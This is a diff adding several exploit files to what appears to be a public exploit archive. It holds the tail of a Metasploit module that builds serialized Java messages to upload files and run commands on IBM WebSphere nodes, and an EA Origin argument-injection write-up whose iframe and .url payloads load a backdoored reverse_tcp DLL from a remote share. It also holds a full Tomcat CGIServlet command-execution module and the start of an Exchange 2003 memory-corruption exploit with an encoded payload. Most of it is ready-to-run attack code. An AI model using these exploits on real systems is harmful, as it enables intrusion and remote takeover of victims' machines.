+    defaults_field.type = 'object'
+    defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults')
+    defaults_field.field_type = field_ref
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties')
+    msg_class_desc.serial_version = 0x3912D07A70363E98
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << defaults_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Set the member values
+    object.class_desc.description = msg_class_desc
+
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName')
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc')
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0')
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch')
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s)
+
+    object
+  end
+
+  def build_p2p_node_class(obj)
+    msg_obj = build_app_node_class(obj)
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
+
+    # Create the data field and add the reference
+    data_field = Rex::Java::Serialization::Model::Field.new
+    data_field.type = 'array'
+    data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data')
+    data_field.field_type = field_ref
+
+    # Create the object field and add the reference
+    prop_field = Rex::Java::Serialization::Model::Field.new
+    prop_field.type = 'object'
+    prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties')
+    prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;')
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty')
+    msg_class_desc.serial_version = 2
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << data_field
+    msg_class_desc.fields << prop_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Create the byte array ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6
+
+    # Construct IP Array
+    byte_array = Rex::Java::Serialization::Model::NewArray.new
+    byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
+    byte_array.array_description.description = field_ref
+    byte_array.type = "byte"
+    byte_array.values = []
+
+    # Set the member values
+    obj.class_data << byte_array
+
+    # Add properties
+    obj.class_data << build_properties_class
+
+    msg_class_desc
+  end
+
+  def build_upfile_arg_class(filename, bytes, cmd)
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
+
+    # Create the integer field and add the reference
+    filename_field = Rex::Java::Serialization::Model::Field.new
+    filename_field.type = 'object'
+    filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName')
+    filename_field.field_type = field_ref
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
+
+    # Create the integer field and add the reference
+    filebody_field = Rex::Java::Serialization::Model::Field.new
+    filebody_field.type = 'array'
+    filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody')
+    filebody_field.field_type = field_ref
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
+
+    # Create the object field and add the reference
+    post_cmd_field = Rex::Java::Serialization::Model::Field.new
+    post_cmd_field.type = 'object'
+    post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd')
+    post_cmd_field.field_type = field_ref
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << filebody_field
+    msg_class_desc.fields << filename_field
+    msg_class_desc.fields << post_cmd_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+    # Create the byte array ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7
+
+    # Construct IP Array
+    byte_array = Rex::Java::Serialization::Model::NewArray.new
+    byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
+    byte_array.array_description.description = field_ref
+    byte_array.type = "byte"
+    byte_array.values = bytes
+
+    # Set the member values
+    object = Rex::Java::Serialization::Model::NewObject.new
+    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    object.class_desc.description = msg_class_desc
+    object.class_data << byte_array
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename)
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd)
+
+    object
+  end
+
+  def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj)
+    msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
+
+    # Create the integer field and add the reference
+    out_int_field = Rex::Java::Serialization::Model::Field.new
+    out_int_field.type = 'int'
+    out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval')
+
+    # Create the task object field and add field_type
+    task_field = Rex::Java::Serialization::Model::Field.new
+    task_field.type = 'object'
+    task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task')
+    task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
+
+    # Create the task object field and add field_type
+    task_arg_field = Rex::Java::Serialization::Model::Field.new
+    task_arg_field.type = 'object'
+    task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument')
+    task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;")
+
+    # Create the integer field and add the reference
+    forward_gather_field = Rex::Java::Serialization::Model::Field.new
+    forward_gather_field.type = 'int'
+    forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod')
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << forward_gather_field
+    msg_class_desc.fields << out_int_field
+    msg_class_desc.fields << task_field
+    msg_class_desc.fields << task_arg_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Set the member values
+    obj.class_data << ['int', 0]
+    obj.class_data << ['int', 1]
+    obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes')
+    obj.class_data << upfile_arg_obj
+
+    msg_class_desc
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/47019.txt b/exploits/windows/remote/47019.txt
new file mode 100644
index 000000000..3aa5209ab
--- /dev/null
+++ b/exploits/windows/remote/47019.txt
@@ -0,0 +1,268 @@
+# Exploit Title: EA Origin <10.5.38 Remote Code Execution
+# Date: 05/22/2019
+# Exploit Author: Dominik Penner (@zer0pwn)
+# Vendor Homepage: https://www.origin.com
+# Software Link: https://www.origin.com/can/en-us/store/download
+# Version: 10.5.38 and below
+# Tested on: Windows 7, Windows 8, Windows 10
+# CVE : CVE-2019-12828
+
+Electronic Arts' Origin Client on Windows in versions 10.5.38 and below is vulnerable to an argument injection vulnerability, that if leveraged properly, can ultimately yield remote code execution.
+
+NOTE: THIS IS TO BE READ IN MARKDOWN (.MD) FORMAT
+
+# 0x01 Introduction
+
+Over the past month or so, I've spent quite a bit of time reading and experimenting with custom URI schemes. As the last post on this blog clearly demonstrated, a poorly implemented custom URI can have a number of security concerns. When I say "a number", it's because I'm about to bring a few more to light, using EA's Origin Client as our crash test dummy.
+
+TL;DR: Another Origin RCE, unrelated to CVE-2019-11354.
+
+# 0x02 Custom URI Schemes
+
+In this demonstration, we're going to be using the Origin client. However, this vulnerability can be found in a number of other applications. This technique is hardly Origin specific. In order for us to fully understand how this exploit works, we need to understand how Windows treats custom URI schemes.
+
+If we look for Origin's URI scheme in the registry, this is what we find.
+
+[![](https://zeropwn.github.io/assets/origin_regedit.png "Origin Regedit")](https://zeropwn.github.io/assets/origin_regedit.png)
+
+As we can see by this snippet, 
+
+```
+"C:\Program Files (x86)\Origin\Origin.exe" "%1"
+```
+
+whenever we call ```origin://``` or ```origin2://```, Windows will use ```ShellExecute()``` to spawn the process and replace %1 with our input.
+
+For example:
+
+```
+origin://game/launch
+```
+
+Spawns the Origin process with the following command line arguments:
+
+```
+C:\Program Files (x86)\Origin\Origin.exe "origin://game/launch"
+```
+
+If we RTFM a little bit and check out MSDN's documentation on registering custom URI schemes, we'll see that they point out some security issues. This is what they have to say:
+
+"As noted above, the string that is passed to a pluggable protocol handler might be broken across multiple parameters. Malicious parties could use additional quote or backslash characters to pass additional command line parameters. For this reason, pluggable protocol handlers should assume that any parameters on the command line could come from malicious parties, and carefully validate them. Applications that could initiate dangerous actions based on external data must first confirm those actions with the user. In addition, handling applications should be tested with URIs that are overly long or contain unexpected (or undesirable) character sequences."
+
+This basically means that the application should be responsible for making sure that there aren't any illegal characters or arguments injected via the crafted URI.
+
+## A long history of URI-based exploits
+As detailed in this blog post... argument injection via URI isn't new... at all. [https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62](https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62)
+
+Some of these vulnerabilities can escape the "%1" argument by adding an unencoded " to the URI. For example, to inject arguments with CVE-2007-3670, all you had to do was get a remote user to visit your specially crafted iframe + URI, and the process would be spawned with the additional arguments injected.
+
+```
+firefoxurl://placeholder" --argument-injection
+```
+
+### Couldn't you just use command injection?
+
+Because of the way ShellExecute gets called and passes the arguments, you cannot ultimately inject your own commands, only arguments.
+
+
+# 0x03 Argument Injection
+
+Due to the way that most applications (browsers, mail clients, etc) handle URIs, this becomes difficult to exploit in 2019. Modern browsers (Chrome, Firefox, Edge) will force encode certain characters when a link is handled. This obviously makes escaping the encapsulation difficult.
+
+However, for custom URIs that don't have encapsulated arguments in the registry, you can easily just inject arguments with a space.
+
+mIRC was recently vulnerable to this, to achieve RCE, the payload ending up being as simple as:
+
+```
+<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini'>
+```
+
+You can read more about how that exploit was discovered and exploited here:
+[https://proofofcalc.com/cve-2019-6453-mIRC/](https://proofofcalc.com/cve-2019-6453-mIRC/)
+
+
+Anyways, for this example with Origin, we're just going to spin up a fresh Windows 8 box and use IE11. We'll talk more about bypassing modern security mechanisms later.
+
+## The Payload
+
+So now that we've spun up our virtual machine, make sure you have Origin installed. Open a notepad, and paste the following:
+
+```
+<iframe src='origin://?" -reverse "'>
+```
+
+Open it in Internet Explorer, and allow Origin to launch (if it even prompts, lol). You should see the following.
+
+[![](https://zeropwn.github.io/assets/origin_reverse.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_reverse.png)
+
+As you can see in the image above, the window icons are now loading in reverse. I failed to mention this, however "-reverse" is a Qt specific argument. Origin is written mainly using the Qt framework, which is what enticed me into trying these arguments.
+
+If we take a look at the process using Process Explorer, we see the following:
+
+[![](https://zeropwn.github.io/assets/origin_reverse_poc.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_reverse_poc.png)
+
+This clearly demonstrates the argument injection.
+
+# 0x04 Arbitrary Code Execution
+
+Now how on earth are we supposed to get code execution from this? For us to see what options we have available, we need to know what other arguments we can use. We'll stick to the Qt specific arguments before poking around Origin's own arguments.
+
+After consulting the Qt documentation [https://doc.qt.io/qt-5/qguiapplication.html](https://doc.qt.io/qt-5/qguiapplication.html), we find out that we can use the following arguments on ANY Qt program.
+
+```
+-platform
+-platformpluginpath
+-platformtheme
+-plugin
+-qmljsdebugger
+-qwindowgeometry
+-qwindowicon
+-qwindowtitle
+-reverse
+-session
+-display
+-geometry
+```
+
+One of the more promising ones was "platformpluginpath". This flag allows you to specify a path to load Qt plugins from. These Qt plugins (DLLs) are then loaded into Origin and executed.
+
+We can exploit this behavior and load plugins remotely if we supply the platformpluginpath argument with a Windows share. 
+
+Qt gives us a table of Qt plugins along with their respective directories. The QGuiApplication will automatically load valid DLLs that are a child of any of the following directories, when given the platformpluginpath argument.
+
+Base Class | Directory | Qt Module
+-----------|-----------|-----------
+QAccessibleBridgePlugin|accessiblebridge| Qt GUI
+QImageIOPlugin|imageformats| Qt GUI
+QPictureFormatPlugin|pictureformats| Qt GUI
+QAudioSystemPlugin|audio| Qt Multimedia
+QDeclarativeVideoBackendFactoryInterface|video/declarativevideobackend|Qt Multimedia
+QGstBufferPoolPlugin|video/bufferpool|Qt Multimedia
+QMediaPlaylistIOPlugin|playlistformats|Qt Multimedia
+QMediaResourcePolicyPlugin|resourcepolicy|Qt Multimedia
+QMediaServiceProviderPlugin|mediaservice|Qt Multimedia
+QSGVideoNodeFactoryPlugin|video/videonode|Qt Multimedia
+QBearerEnginePlugin|bearer|Qt Network
+QPlatformInputContextPlugin|platforminputcontexts|Qt Platform Abstraction
+QPlatformIntegrationPlugin|platforms|Qt Platform Abstraction
+QPlatformThemePlugin|platformthemes|Qt Platform Abstraction
+QGeoPositionInfoSourceFactory|position|Qt Positioning
+QPlatformPrinterSupportPlugin|printsupport|Qt Print Support
+QSGContextPlugin|scenegraph| Qt Quick
+QScriptExtensionPlugin|script| Qt Script
+QSensorGesturePluginInterface|sensorgestures| Qt Sensors
+QSensorPluginInterface|sensors| Qt Sensors
+QSqlDriverPlugin|sqldrivers| Qt SQL
+QIconEnginePlugin|iconengines| Qt SVG
+QAccessiblePlugin|accessible| Qt Widgets
+QStylePlugin|styles| Qt Widgets
+
+
+Because Origin uses the QtWebEngine and works with image files (jpg, gif, bmp, etc), it requires a few Qt plugins. If we take a look in Origin's install path, we'll see an "imageformats" directory, which is populated by a number of DLLs.
+
+[![](https://zeropwn.github.io/assets/imageformats_plugins.png "Origin Arginj")](https://zeropwn.github.io/assets/imageformats_plugins.png)
+
+Since we know for sure that Origin works with those following DLLs, we can take one of them and use them as a template for our reverse_tcp.
+
+Before we move forward however, let's just make sure that we can reach a remote destination via the platformpluginpath flag.
+
+[![](https://zeropwn.github.io/assets/origin_remote_plugin.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_remote_plugin.png)
+
+Looks good to me.
+
+## Creating the Backdoored Plugin
+
+As I mentioned earlier, since we have a few DLLs that we know for sure Origin uses, we can use them as templates for an msfvenom payload. The following image demonstrates the creation of a reverse_tcp by first using a DLL file as a template. Qt is pretty picky about what plugins get loaded into memory, which is why I decided to use a template. However, for future reference, all it requires is a valid ```.qtmetad``` section.
+
+
+[![](https://zeropwn.github.io/assets/create_payload.png "Origin Arginj")](https://zeropwn.github.io/assets/create_payload.png)
+
+Now that we've created our backdoored plugin, all we have to do is host a Windows share where we can remotely download it from.
+
+This Windows share must have one of the directories from the table within it, otherwise it won't properly load the DLL. Since we're using imageformats... well, we'll use imageformats.
+
+[![](https://zeropwn.github.io/assets/remote_share.png "Origin Arginj")](https://zeropwn.github.io/assets/remote_share.png)
+
+Where imageformats is hosting our backdoored plugin "FILE1337.dll"
+
+## Finalizing the Payload
+
+Obviously, this isn't complete yet. We have "arguably" arbitrary code execution, but not remote yet as we have no way to get a user to actually launch our crafted URI. This is where the iframe comes in.
+
+```
+<iframe src='origin://?" -platformpluginpath \\NOTDANGEROUS "'>
+```
+
+We can host this iframe wherever we want, our target just needs to open it on an outdated browser. If you try the following on Firefox, the process getting spawned looks like this:
+
+[![](https://zeropwn.github.io/assets/opened_from_firefox.png "Origin Arginj")](https://zeropwn.github.io/assets/opened_from_firefox.png)
+
+Clearly this defeats the argument injection, which is what I mentioned earlier. This makes exploiting the Origin vulnerability much more difficult.
+
+Unless we can find a way to launch the process without encoding the special characters on an updated system... this exploit may not pose as big a threat.
+
+Anyways, like before, let's just make sure everything works on Internet Explorer before we get ahead of ourselves.
+
+<iframe width="780" height="550" src="https://www.youtube.com/embed/E9vCx9KsF3c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
+
+# 0x05 An Issue With .URL Files
+
+Seeing as modern browsers seem to protect against injecting arguments into custom URIs, I decided to look into Windows shortcuts. Interestingly enough, shortcut files do not encode special characters, which is an issue on its own. Would Microsoft consider this an issue? Hard to say. If they do, you saw it here first lol.
+
+Anyways, a .url file typically looks like this:
+
+```
+[InternetShortcut]
+URL=https://www.google.com
+```
+
+If you click that file, it will open Google in your default browser. However, if we supply it a custom URI, it will launch using said URI. On top of that... we can inject arguments, because of the lack of sanitization. This could be used to exploit a number of applications... not just Origin.
+
+You can use the following .URL file on a fully updated Windows 10 to inject arguments into the Origin process. Let's check it out.
+
+```
+[InternetShortcut]
+URL=origin://?" -reverse "
+```
+
+[![](https://zeropwn.github.io/assets/origin_win10.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_win10.png)
+
+The Origin icon you're seeing in the background is the shortuct itself. Nearly impossible to notice the difference between a legitimate Origin.exe shortcut.
+
+Clearly this attack vector would require some social engineering. .URL files aren't considered dangerous by most browsers. For example, Edge will ask you if you want to open the file, it'll smart-scan it, pass the scan, and launch the process with the injected arguments. 
+
+If you were to convince someone to open a specially crafted .url file, you could leverage code execution and infect someone via the custom URI scheme Origin has implemented.
+
+
+# 0x06 Tying It All Togther
+
+We've gotten this far, you may have a couple questions. One of them may be, what if the Origin process is already running? How will the arguments get injected then?
+
+That's where some of Origin's built-in command-line options will come in handy. There are a number of arguments that Origin accepts that we can use maliciously. So, let's say Origin's already running. In our payload, simply add the following argument:
+
+```
+origin://?" -Origin_MultipleInstances "
+```
+
+If there's another Origin process running, it'll spawn a brand new one with the arguments we supplied.
+
+Now, let's also assume that someone installed Origin months ago and haven't touched it in the same amount of time. Whenever Origin starts, it automatically checks for updates before doing anything else. Which means that if Origin were to push out a patch, your client would update before the payload was even executed.
+
+If we feed Origin the following argument, we can jump over the entire update check.
+
+```
+origin://?" /noUpdate "
+```
+
+Another thing we can do... is let Origin run in the background without bringing any attention to the process. Combine all of that along with the remote plugin preload and you've got a pretty fun exploit.
+
+```
+origin://?" /StartClientMinimized /noUpdate -Origin_MultipleInstances "
+```
+
+
+# References
+* [https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62](https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62)
+* [https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739](https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739)
+* [https://proofofcalc.com/cve-2019-6453-mIRC](https://proofofcalc.com/cve-2019-6453-mIRC)
+* [https://doc.qt.io/qt-5/qguiapplication.html](https://doc.qt.io/qt-5/qguiapplication.html)
\ No newline at end of file
diff --git a/exploits/windows/remote/47073.rb b/exploits/windows/remote/47073.rb
new file mode 100755
index 000000000..38879d7c9
--- /dev/null
+++ b/exploits/windows/remote/47073.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'            => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
+      'Description'     => %q{
+        This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
+        enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
+        system commands, and gain remote code execution.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Yakov Shafranovich', # Original discovery
+          'sinn3r'              # Metasploit module
+        ],
+      'Platform'        => 'win',
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Targets'         =>
+        [
+          [ 'Apache Tomcat 9.0 or prior for Windows', { } ]
+        ],
+      'References'      =>
+        [
+          ['CVE', '2019-0232'],
+          ['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
+          ['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
+        ],
+      'Notes'           =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'CmdStagerFlavor' => 'vbs',
+      'DefaultOptions'  =>
+        {
+          'RPORT' => 8080
+        },
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Apr 10 2019', # Date of public advisory issued by the vendor
+      'DefaultTarget'   => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [false, 'Override check result', false])
+      ])
+
+    deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
+  end
+
+  def check
+    sig = Rex::Text.rand_text_alpha(10)
+    uri = normalize_uri(target_uri.path)
+    uri << "?&echo+#{sig}"
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    unless res
+      vprint_error('No Response from server')
+      return CheckCode::Unknown
+    end
+
+    if res.body.include?(sig)
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts={})
+    # Our command stager assumes we have access to environment variables.
+    # We don't necessarily have that, so we have to modify cscript to a full path.
+    cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe')
+
+    uri = normalize_uri(target_uri.path)
+    uri << "?&#{CGI.escape(cmd)}"
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'No response from server')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+    end
+  end
+
+  # it seems we don't really have a way to retrieve the filenames from the VBS command stager,
+  # so we need to rely on the user to cleanup the files.
+  def on_new_session(cli)
+    print_warning('Make sure to manually cleanup the exe generated by the exploit')
+    super
+  end
+
+  def exploit
+    print_status("Checking if #{rhost} is vulnerable")
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+
+      print_warning('Target does not appear to be vulnerable.')
+    end
+
+    print_status("#{rhost} seems vulnerable, what a good day.")
+    execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000)
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/47076.py b/exploits/windows/remote/47076.py
new file mode 100755
index 000000000..7735a4cfb
--- /dev/null
+++ b/exploits/windows/remote/47076.py
@@ -0,0 +1,1544 @@
+# Python 2.7 (included with ImmunityDBG)
+# Exchange 2003 SP0 base64-MIME memory corruption
+# NSA's `ENGLISHMANSDENTIST`
+# Platform: Windows Server 2003 R2
+# Shout out to the Equation Group, NSA Tailored Access Operations
+# Author: Charles Truscott @r0ss1n1
+# Shout out to Offensive Security, from Australia with Love
+
+
+
+
+import time
+import socket
+import base64
+import struct
+
+
+#payload ="eJ8+InlpAQaQCAAEAAAAAAABAAEAAgKQBgAOAAAAAAAAAAAAAAAAAAAAAAAAAAIFkAYAevwAAAEA" + "\r\n"
+#payload+="AAANAAE3AQAAAGr8AAALAAAAAAAAAMAAAAAAAABG0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAD" + "\r\n"
+#payload+="AP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAEAAA/v///wAAAAD+////AAAAAAAAAAD/////" + "\r\n"
+#payload+="////////////////////////////////////////////////////////////////////////////" + "\r\n"
+
+
+def sendpayload(username, password, toaddr, fromaddr):
+    englishmansdentist="eJ8+InlpAQaQCAAEAAAAAAABAAEAAgKQBgAOAAAAAAAAAAAAAAAAAAAAAAAAAAIF" + "\r\n"
+    englishmansdentist+="kAYAevwAAAEAAAANAAE3AQAAAGr8AAALAAAAAAAAAMAAAAAAAABG0M8R4KGxGuEA" + "\r\n"
+    englishmansdentist+="AAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAA" + "\r\n"
+    englishmansdentist+="EAAA/v///wAAAAD+////AAAAAAAAAAD/////////////////////////////////" + "\r\n"
+    englishmansdentist+="////////////////////////////////////////////////////////////////" + "\r\n"
+    englishmansdentist+="////////////////////////////////////////////////////////////////" + "\r\n"
+    englishmansdentist+="////////////////////////////////////////////////////////////////" + "\r\n"
+    englishmansdentist+="////////////////////////////////////////////////////////////////" + "\r\n"
+    englishmansdentist+="////////////////////////////////////////////////////////////////" + "\r\n"
+    englishmansdentist+="////////////////////////////////////////////////////////////////" + "\r\n"
+    englishmansdentist+="////////////////////////////////////////////////////////////////" + "\r\n"
+    englishmansdentist+="////////////////////////////////////////////////////////////////" + "\r\n"
+    englishmansdentist+="///////////////////////////////9/////v///wMAAAAEAAAABQAAAAYAAAAH" + "\r\n"
+    englishmansdentist+="AAAACAAAAAkAAAAKAAAACwAAAAwAAAANAAAADgAAAA8AAAAQAAAAEQAAABIAAAAT" + "\r\n"
+    englishmansdentist+="AAAAFAAAABUAAAAWAAAAFwAAABgAAAAZAAAAGgAAABsAAAAcAAAAHQAAAB4AAAAf" + "\r\n"
+    englishmansdentist+="AAAAIAAAACEAAAAiAAAAIwAAACQAAAAlAAAAJgAAACcAAAAoAAAAKQAAACoAAAAr" + "\r\n"
+    englishmansdentist+="AAAALAAAAC0AAAAuAAAALwAAADAAAAAxAAAAMgAAADMAAAA0AAAANQAAADYAAAA3" + "\r\n"
+    englishmansdentist+="AAAAOAAAADkAAAA6AAAAOwAAADwAAAA9AAAAPgAAAD8AAABAAAAAQQAAAEIAAABD" + "\r\n"
+    englishmansdentist+="AAAARAAAAEUAAABGAAAARwAAAEgAAABJAAAASgAAAEsAAABMAAAATQAAAE4AAABP" + "\r\n"
+    englishmansdentist+="AAAAUAAAAFEAAABSAAAAUwAAAFQAAABVAAAAVgAAAFcAAABYAAAAWQAAAFoAAABb" + "\r\n"
+    englishmansdentist+="AAAAXAAAAF0AAABeAAAAXwAAAGAAAABhAAAAYgAAAGMAAABkAAAAZQAAAGYAAABn" + "\r\n"
+    englishmansdentist+="AAAAaAAAAGkAAABqAAAAawAAAGwAAABtAAAAbgAAAG8AAABwAAAAcQAAAHIAAABz" + "\r\n"
+    englishmansdentist+="AAAAdAAAAHUAAAB2AAAAdwAAAHgAAAB5AAAAegAAAHsAAAB8AAAAfQAAAH4AAAD+" + "\r\n"
+    englishmansdentist+="/////////1IAbwBvAHQAIABFAG4AdAByAHkAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "\r\n"
+    englishmansdentist+="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWAAUA//////////8BAAAAAAIIAwAAAADA" + "\r\n"
+    englishmansdentist+="AAAAAAAARwAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAAAAAAAAAgBPAGwAZQBQ" + "\r\n"
+    englishmansdentist+="AHIAZQBzADAAMAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "\r\n"
+    englishmansdentist+="AAAAAAAAABgAAgH///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "\r\n"
+    englishmansdentist+="AAAAAAAAAAAAAAACAAAAWvYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "\r\n"
